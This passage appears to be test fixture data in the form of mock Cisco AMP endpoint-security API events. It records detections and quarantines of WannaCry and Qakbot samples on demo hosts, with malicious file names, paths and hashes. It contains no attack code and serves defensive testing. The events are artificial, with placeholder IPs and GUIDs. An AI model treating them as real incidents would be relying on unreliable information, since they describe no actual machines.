2d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":620000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":355000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":308000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":293000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":277000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":230000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":184000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":152000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine 